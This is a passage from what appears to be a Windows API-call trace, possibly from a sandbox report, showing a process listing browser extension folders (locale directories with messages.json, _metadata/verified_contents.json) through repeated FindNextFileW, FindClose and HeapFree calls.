lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.846] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.847] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.847] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.847] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.847] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.847] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.847] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.847] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.848] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.848] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.848] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.848] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.848] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.849] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.849] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.849] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0052.849] FindClose (in: hFindFile=0x3ef1680 | out: hFindFile=0x3ef1680) returned 1 [0052.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4012508 | out: hHeap=0x570000) returned 1 [0052.852] FindNextFileW (in: hFindFile=0x3ef1640, lpFindFileData=0x353e1ac | out: lpFindFileData=0x353e1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0052.852] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.852] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x628aed00, ftLastWriteTime.dwHighDateTime=0x1d0f5b2, nFileSizeHigh=0x0, nFileSizeLow=0x2769, dwReserved0=0x0, dwReserved1=0x0, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 1 [0052.852] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x628aed00, ftLastWriteTime.dwHighDateTime=0x1d0f5b2, nFileSizeHigh=0x0, nFileSizeLow=0x2769, dwReserved0=0x0, dwReserved1=0x0, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 0 [0052.853] FindClose (in: hFindFile=0x3ef1680 | out: hFindFile=0x3ef1680) returned 1 [0052.853] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.853] FindNextFileW (in: hFindFile=0x3ef1640, lpFindFileData=0x353e1ac | out: lpFindFileData=0x353e1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0052.853] FindClose (in: hFindFile=0x3ef1640 | out: hFindFile=0x3ef1640) returned 1 [0052.853] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fe24f0 | out: hHeap=0x570000) returned 1 [0052.853] FindNextFileW (in: hFindFile=0x3ef1500, lpFindFileData=0x353e428 | out: lpFindFileData=0x353e428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85639950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.2.8_0", cAlternateFileName="4278E1~1.8_0")) returned 0 [0052.853] FindClose (in: hFindFile=0x3ef1500 | out: hFindFile=0x3ef1500) returned 1 [0052.853] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f24080 | out: hHeap=0x570000) returned 1 [0052.854] FindNextFileW (in: hFindFile=0x3ef1440, lpFindFileData=0x353e6a4 | out: lpFindFileData=0x353e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="felcaaldnbdncclmgdcncolpebgiejap", cAlternateFileName="FELCAA~1")) returned 1 [0052.908] FindNextFileW (in: hFindFile=0x3ef1500, lpFindFileData=0x353e428 | out: lpFindFileData=0x353e428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.908] FindNextFileW (in: hFindFile=0x3ef1500, lpFindFileData=0x353e428 | out: lpFindFileData=0x353e428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8401b790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844b1ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844b1ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1_0", cAlternateFileName="")) returned 1 [0052.910] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353e1ac | out: lpFindFileData=0x353e1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8401b790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844b1ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844b1ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, 